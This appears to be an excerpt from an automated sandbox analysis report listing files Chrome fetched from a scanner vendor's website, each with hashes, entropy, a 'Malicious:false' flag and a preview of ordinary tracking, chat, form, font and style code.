                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):244375
                                                                                                                                                                                              Entropy (8bit):5.4541358501238815
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713EN:pfLeYc+PJxH8NNfFcrHurPK713C
                                                                                                                                                                                              MD5:98A1AA6D0155EA8597C93CD050CE5808
                                                                                                                                                                                              SHA1:C844C1CBAA79A4F09F50E2DF3F648B8B5AA6CB5E
                                                                                                                                                                                              SHA-256:527BF3DACC5EB62211130FE4BF315C682861320AB25B4AA2EFE6EA87A760DB8C
                                                                                                                                                                                              SHA-512:BB01621E0CBE1185D2167CEDB9517A29FE6537AE0E23254243DF90F36A66A0E1D91034E9A772E76C94FC1E1E969DB9082177777EC6085A752B3BCB9BC8B98BC2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 17120, version 1.1
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):17120
                                                                                                                                                                                              Entropy (8bit):7.970834366640101
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:tJtXUiTq3FrSs8Cp2R1XU0azixuy5SEAMkAKdcHfoYSbKl:JXUYYKCYR1k0a2xx5rLkAgcHASl
                                                                                                                                                                                              MD5:DE9FEB9C5E9EC15262C2205B04F653EF
                                                                                                                                                                                              SHA1:028480A7E90BCE8F32349CCFDF4861DF041A4D0E
                                                                                                                                                                                              SHA-256:00162E39FFFEBF54A6D551DCE591AEE5F09FA25DBD3545C18B23951FB2E3125A
                                                                                                                                                                                              SHA-512:DF9A2597DBCEFF4143521FFF1590C21C3CDCA00F4860A0FFEFA46F9708918C5BC143FF34E0571771FF224C90E1183E2F2E518A0A96532AADA0738F63A974C07D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVQUwaEQbjA.woff
                                                                                                                                                                                              Preview:wOFF......B.......cD........................GDEF...X...^...|....GPOS............B.vGSUB...H.......h'X,.OS/2.......S...`s..STAT...L...H...^^.C9cmap...........0$..Qgasp...`...........#glyf...p..0...F0.P..head..9....6...6./..hhea..:0.......$.V.Fhmtx..:P...y...`N.J.loca..<........2...maxp..>........ .%..name..?....'...x7.c.post..@(.........HJ.x......Q...}..*.*@.2m.@."1 .F W.........,$TP..v.^.>.B.I...BCSheC;.:z..T.[.k.a..9.I....O..3.....x.=...\K.D..O....m.m;...m.m.5.....U............`..+S.....m.o.h....M...o.0... .......n.0..1.n....h^...T-,C/..!..|,.....!..i..~.A4.Z....a.A..a.0_z..........2.b...\.,.tP........._..#..x).@8&.I......#.|..V.(...A{..i.@.....A...Y..).^...d..dv..n.Mjv:O.....(.<.!..m..3!.|.....Z*=.i<.p.k..od/..:.\.......L."@&.e.A.....v..gg.Iv..f..^...`[.&...a+.2..-`s.,6.Ma..x6..d}.(H.....O.MA7l..Dg....].....ZDsh.M.Q4..Q...v..Q..F.....|..2Q.JF~..F.(.K._.yg^.G...c....9b...f.Yc....3.L1...3..1.L..1.L.S.T1.L.;OT.........$.cL...v.Ea.cy...%.........n.+.....`.b..z...
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (20051), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):20051
                                                                                                                                                                                              Entropy (8bit):4.7976770046103745
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:I3sXkEzOm9Oq/tThyIeGe0cGAyBi1SpSgsVY8s:iGAyMS
                                                                                                                                                                                              MD5:0A25F705356CC0E85F2CE6E5E9C9A6F0
                                                                                                                                                                                              SHA1:006DF05951ED3DB4F46AB11949DF01489D16FBA7
                                                                                                                                                                                              SHA-256:A3C0F9E0F1FA7D9929EE9D5F3575E135BCBE6CFDC60966DB4AA1C891612BA9E7
                                                                                                                                                                                              SHA-512:1BD45800A426894DEAD519642B57AB700DC145BA7FBC7F17D3D5EA5344C0C2099A3F98266847C53701FF68A0AB2E095207CC3E2A22ACE0FF61BE05C38445DAFD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-c51b1940.min.css
                                                                                                                                                                                              Preview:.wpcf7 .screen-reader-response{position:absolute;overflow:hidden;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;width:1px;margin:-1px;padding:0;border:0;word-wrap:normal!important}.wpcf7 form .wpcf7-response-output{margin:2em .5em 1em;padding:.2em 1em;border:2px solid #00a0d2}.wpcf7 form.init .wpcf7-response-output,.wpcf7 form.resetting .wpcf7-response-output,.wpcf7 form.submitting .wpcf7-response-output{display:none}.wpcf7 form.sent .wpcf7-response-output{border-color:#46b450}.wpcf7 form.failed .wpcf7-response-output,.wpcf7 form.aborted .wpcf7-response-output{border-color:#dc3232}.wpcf7 form.spam .wpcf7-response-output{border-color:#f56e28}.wpcf7 form.invalid .wpcf7-response-output,.wpcf7 form.unaccepted .wpcf7-response-output,.wpcf7 form.payment-required .wpcf7-response-output{border-color:#ffb900}.wpcf7-form-control-wrap{position:relative}.wpcf7-not-valid-tip{color:#dc3232;font-size:1em;font-weight:400;display:block}.use-floating-validation-tip .wpcf7-not-valid-tip{posit
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):3501
                                                                                                                                                                                              Entropy (8bit):5.383873370647921
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                              MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                              SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                              SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                              SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.googletagmanager.com/static/service_worker/4bj0/sw_iframe.html?origin=https%3A%2F%2Fambir.com
                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):845
                                                                                                                                                                                              Entropy (8bit):4.96840522065134
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:YdOH0L5CukyaNruRCy14zAEQtpyhYSgAMtx2:YdPL5CTyaZ4Cy14UEEyhYS0tx2
                                                                                                                                                                                              MD5:D542047D757E102A90FE397D6F002E48
                                                                                                                                                                                              SHA1:6D93E21717F21460ED8ADC5B38C52900AAE5270F
                                                                                                                                                                                              SHA-256:BA43A3D4F7F2EC16295F4C64A9E723AA3335925A4C693D02B195295E62DD2B64
                                                                                                                                                                                              SHA-512:F372C6098760B0FDD25F60DA99E3D1D6F649C140A86B445E09CEB85BB17E58DCEE57472E61322048B447DC774C23ABDB67F93438AD5CDFE36C2374DB36FC82B5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://knrpc.olark.com/nrpc/c?c=create&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&g=ALL&q=precache038757109200029083&j=o0&version=loader-precache&xhttp=1&u=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&r=&ca=false&ru=false&ae=
                                                                                                                                                                                              Preview:{"conversation_history": [], "capacity": false, "site_is_online": false, "status_state": "offline", "conversation_has_slot": false, "has_free_chats": true, "site_config_changed": false, "assets_config_md5": "c87dc7f0f6c6c4f9a50761cab5b8da86", "ipaddress": "8.46.123.75", "geolocation_data": {"country": "United States", "ipaddress": "8.46.123.75", "city": "Cocoa Beach", "state": "FL", "country_code": "US", "lat": 28.320007, "long": -80.607551}, "operator_composing_state": "active", "operator_nickname": null, "in_active_conversation": false, "operator_has_sent_message": false, "ssl": true, "is_premium": true, "is_popup": false, "visitor_id": "QnUrnKaYLl744rSP542fr0UBrj6a8ok0", "dormant": true, "conversation_id": "tM65kxeIWm5Vcm4e542fr0UBjA8B6bor", "resend_nickname": false, "resend_status": false, "machine": "nrpc-http-5d9875854f-rwksj"}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):26106
                                                                                                                                                                                              Entropy (8bit):5.279792248578483
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:HyiUGUQ/cEN/MpqDMCC/MD6cn3L0Jpl8uClD2tFtJ7byTwtawuf8OQL0sAZAGNWw:HyiUGUa996k3LkgoCWL0si4eLe02Vauu
                                                                                                                                                                                              MD5:33FDB0B4D490C8D40F45F930AD2E6E13
                                                                                                                                                                                              SHA1:39042205A70AC91884971DF621BE5D6AFE83338C
                                                                                                                                                                                              SHA-256:BAB9A1AE86EF77B04E7782148870F0C528A692BDAD407D044505B99BA43C3071
                                                                                                                                                                                              SHA-512:A58077C5C1F61EEEC9B415F9051DCAE0CBAE2DD3BF6531B4FEC378DD716FF023314D0F2236A2CF0CC4A0906D50260835C4D64070F54ACF3F7DEAA07435E31F38
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-71030d0b.min.js
                                                                                                                                                                                              Preview:./*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>S,addAction:()=>m,addFilter:()=>p,applyFilters:()=>k,createHooks:()=>h,currentAction:()=>w,currentFilter:()=>I,defaultHooks:()=>f,didAction:()=>O,didFilter:()=>j,doAction:()=>b,doingAction:()=>x,doingFilter:()=>T,filters:()=>z,hasAction:()=>v,hasFilter:()=>y,removeAction:()=>A,removeAllActions:()=>F,removeAllFilters:()=>g,removeFilter:()=>_});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, under
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (6414)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):385690
                                                                                                                                                                                              Entropy (8bit):5.582091670126337
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:S4OVMX/iOG9e5PmPL97aBJDMfgQJYjOg3x0/aHA:bOQ6Q5PmR7edg
                                                                                                                                                                                              MD5:A6799D20718F6A292B8B6968C78ED581
                                                                                                                                                                                              SHA1:4F4219927A0D7DA21854C41FE0EAD1123ED481D4
                                                                                                                                                                                              SHA-256:3B14C066EBF91F460341888008CBEA66878F4214FAE5B41D1F3976843714E755
                                                                                                                                                                                              SHA-512:BF4D9082957E513042551E135E2131495D61B3314D90F37DB7F7D285E57CA97A4F93675BC91B69F4D14D8E5E852297993CA61AC43A3D9AE6803C1BDA49C10A42
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":26,"vtp_rules":["list","^ambir\\-technology\\.myshopify\\.com$","^ambir\\.com$"],"tag_id":14},{"function":"__ogt_ads_datatos","priority":26,"vtp_instanceDestinationId":"AW-1070729751","tag_id":36},{"function":"__ogt_1p_data_v2","priority":16,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":true,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"#TextField4","vtp_isAutoEnabled":true,"vtp_manualPhoneEnabled":true,"vtp_manualAddressEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_postalCodeValue":"#TextField5","vtp_lastNameValue":"#TextField1","vtp_phoneType":"CSS_SELECTOR","vtp
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                              Entropy (8bit):4.347811435468635
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (666), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):666
                                                                                                                                                                                              Entropy (8bit):5.233014973891215
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:haxVfMbnp22AwEojP2gdvINe7WOoAvmbRXu6TT7eR4VXHVc8KsOPhIG:haHMpVjPDdvLqWYlDT7eRYFc8KZhIG
                                                                                                                                                                                              MD5:7DC96CB40B7B2A6B543499EBA3AE09AB
                                                                                                                                                                                              SHA1:71F534FA3FFF44D9569BF7BFACD2EFBD7765E3E3
                                                                                                                                                                                              SHA-256:89EE29A34AF8FDB2A7D8AC73DF7F5A32B09B5BC1003FFE3A4BA1CFE367448004
                                                                                                                                                                                              SHA-512:2461A2C451FD334B9707783C41B89859E47924FC6E3C99FE82DD5B10B2FCEA00B7BE1E2A624AC983F9A8223E1901B91728A2ACEFE36F55BFA38C33A6B9DF26B4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND
                                                                                                                                                                                              Preview:<!DOCTYPE html><html><head><meta charset="UTF-8"><script>const urlParams=new URLSearchParams(document.location.search),adv=urlParams.get("advertisable"),fpc=urlParams.get("adroll_fpc").split("-")[0],origin=document.location.origin;let url=origin+"/igs?advertisable="+adv+"&fpc="+fpc;function joinInterestGroups(e=null){let n=null!==e?"&cd_label="+e:"";var o=new XMLHttpRequest;o.responseType="json",o.open("GET",url+n,!0),o.onload=()=>{o.response.forEach((e=>{navigator.joinAdInterestGroup(e,2592e3)}))},o.send(null)}"cookieDeprecationLabel"in navigator?navigator.cookieDeprecationLabel.getValue().then(joinInterestGroups):joinInterestGroups()</script></head></html>
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (14052)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):14510
                                                                                                                                                                                              Entropy (8bit):5.077208470174998
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:s0x++beOAj/BQ5RGFhJdN10xt2v3fhN5BV9T1FOxrM9F7klAsdxxJiZDBZv0Er8U:s0x++SAS6xgj7d0ErPFGiG9E
                                                                                                                                                                                              MD5:21B3C411436805F5884CA32DB35F4FB4
                                                                                                                                                                                              SHA1:D173F4855A03A83D2BB2C62F55B33E5644A7DF65
                                                                                                                                                                                              SHA-256:4366513B2340D9ACDA4D69D3593CD66BE08EAC97EC7EC91C4173135069299046
                                                                                                                                                                                              SHA-512:2D077B020CD125B32B6C5CB37BA39EC8B8457863D2F82F1E722F7B9953E6E28D6C1B685EA2E4B61FE7E42618EA53BDCB843A565DF20D0DA55190A325AA9F3FDB
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:. (function(){. olark.extend('CalloutBubble');.olark.extend('Feedback');.olark.extend('Sounds');.olark.extend('WelcomeAssist');... var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout). if(isNewVersion) {. olark._.finish({"CalloutBubble":{"bubble_image_url":"","enabled":true,"slide":false},"Feedback":{"enabled":true},"Sounds":{"enabled":true},"WelcomeAssist":{"enabled":true,"notify_operator_of_new_visitors":false,"welcome_delay_in_seconds":30,"welcome_messages":["Hey there! Can we help you out?"],"welcome_new_visitors":true},"system":{"allow_change_colors":true,"allow_change_height":true,"allow_change_width":true,"allowed_domains":"*.docketport.com,*.ambir.com","append_to_body":1,"away_text":"Contact us","before_chat_text":"Chat with us","bottom_margin":0,"branding":"powered_by","branding_link_text":"Powered by Olark","branding_panel_cancel_text":"Go back","branding_panel_link_text":"Try Olark on your s
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):58687
                                                                                                                                                                                              Entropy (8bit):5.040021814117515
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:nOQ8Wvr+vrQvr6dfDJOCBJmhb6fnDyXF69bWYDxmYPbL59iBsGTf:OQ8Wvr+vrQvr6dbEFhbq9bxPbPe
                                                                                                                                                                                              MD5:543197F4AE298F5DED2AC62E00A66656
                                                                                                                                                                                              SHA1:802EC6FD01B68B012185A8C18A197AF17F72DA41
                                                                                                                                                                                              SHA-256:8FE5FC96218D8A1F23ECF35DF8EA4B190AB40CBDD10BF6686A965EEF3C80B277
                                                                                                                                                                                              SHA-512:8788C8DCA47B2C7E23DAF4EA3612DA5583F26AFCEF9F50F0D7DF4903F20738DBFE75C0BDED9C74DE9E401E8BA5FBA14AD2F0E78690EF4ECD83DBBE1ED7DE2B45
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/css/themes/media.543197f4ae298f5ded2ac62e00a66656.css
                                                                                                                                                                                              Preview:/* $Id: $ */.@charset "UTF-8";./* CSS Document */../*==================================RESPONSIVE LAYOUTS===============================================*/.@-webkit-viewport {.width:device-width.}.@-moz-viewport {.width:device-width.}.@-ms-viewport {.width:device-width.}.@-o-viewport {.width:device-width.}../* Ipad (Live Themes) Start */..@media only screen and (min-width:1024px) {...body{..min-width:800px;..}....topContainer{..background-size:contain;..background-position: center bottom;..}....btmContainer{..background-size:contain;..background-position: center top;..}....tempHeadBdr{..background-size:contain;..}...}...@media only screen and (max-width:558px) {.. .twoColumns.zfCusRadio .tempContDiv span.cusChoiceSpan {. width: 45%;..}....cameraWrapper{width: 87% !important;}.}..@media only screen and (max-width:768px) {...templateWidth, .thankyouPageWrap .tyTemplateWidth{..width:100%;..margin-right:0; margin-left:0;..}..geoLocationPopup .templateWidth {. width:100%;. }..t
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (43548)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):137872
                                                                                                                                                                                              Entropy (8bit):5.437710983875947
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:oUq/NU5vvetAIRYQ+jpCCmZHG3ctObIWPMap:Jq/NU5etAIRYFpCCmZHGMtObIWPMap
                                                                                                                                                                                              MD5:5B4127DFFA9D7D62E706A3315955342C
                                                                                                                                                                                              SHA1:D910A31A04C0052F16CBA8C13DB2ADE251886D0E
                                                                                                                                                                                              SHA-256:BDB5BC54CD5D7A84EBF1694961E4648C368F31864E3D9D53EC64C27DD7647ECD
                                                                                                                                                                                              SHA-512:3B3461172A1A95F7B4FA9FE3C8B30F0D8C1D42A91E686FF6D34B2BBC270CB2811C46D79DDAAB39724474CEB83708CF65D6C6D85196C58B601463EC5DB525F77E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://forms.zohopublic.com/ambirtech/form/ScannerBrochureDownload/formperma/Ariy9HGiAVXh5JfOrGqqgQZdZYr8pgPgm4tTdrChjcU
                                                                                                                                                                                              Preview:.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> .<meta http-equiv="x-ua-compatible" content="IE=edge" />.<html xmlns="http://www.w3.org/1999/xhtml"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. To disallow zoom in mobile browser, maximum-scale to 1 in form live page. -->.<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1"/>.<meta name="MobileOptimized" content="width"><meta name="HandheldFriendly" content="true"><meta http-equiv="cleartype" content="on">.<meta property="og:title" content="Download&#x20;our&#x20;Scanners&#x20;Comparison&#x20;Chart" /><meta property="og:type" content="website" /><meta property="og:url" content="https://forms.zohopublic.com/ambirtech/form/ScannerBrochureDownload/formperma/Ariy9HGiAVXh5JfOrGqqgQZdZYr8pgPgm4tTdrChjcU" />.<meta property="og:description" content="Fill out this form." /><head> Google
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (24870)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):49205
                                                                                                                                                                                              Entropy (8bit):5.260673325012671
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:X+tVxFm61ikpCQ9HuGH5iwqWWN7KOljuOzQYqE30/RuHRXrYPH0KO0ZVsi3Z5vJ6:7i3E
                                                                                                                                                                                              MD5:64A8814DB50D35A53F960C50383647E6
                                                                                                                                                                                              SHA1:32980FA3B67E6D0D5CB8636ED3C33145BCFC195F
                                                                                                                                                                                              SHA-256:69B3D37EE17F757209387B4922DCC7C295EA23056602E0A1C9808BB12202AC0C
                                                                                                                                                                                              SHA-512:47C4F853E50906C17F3A21EE1B06392FE8FB3B4A409E664E3B72195911A880A5BA97923721B586BE7246E73D9C5A21F4247A6E45F4300B91BE55B9C6C65BCAFE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:..var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/ambir.com\/wp-admin\/admin-ajax.php","nonce":"fd85e3f2ce","urls":{"assets":"https:\/\/ambir.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/ambir.com\/wp-json\/"},"settings":{"lazy_load_background_images":true},"popup":{"hasPopUps":false},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (62388), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):437268
                                                                                                                                                                                              Entropy (8bit):5.608887245430585
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:aD+St1FS1XbGBa95Wlm8R9JX3yxEmoJPyB5fOmRYYMrmgmETVFzrpQqr3K9zwrc3:aD+St61LGBk5um8Rz3dcBNrj
                                                                                                                                                                                              MD5:E854A58FE58B0FCB7247838D0647CD37
                                                                                                                                                                                              SHA1:C09DD529E8055665A96B7E073713EE77607216DA
                                                                                                                                                                                              SHA-256:FB51BA4028CA8426B72C2363984EB0553CB0864A61681EA082C6AE9B739D8530
                                                                                                                                                                                              SHA-512:EB4F1D4EB2D899F95913A86D7CD6E54E0420856B12258ABE69D1440CB5C2E49C35A7A5393DBDD8EF8C7BD683F099898E63F30B87F99EE11BF078E96B32659346
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://acsbapp.com/apps/app/dist/js/app.js
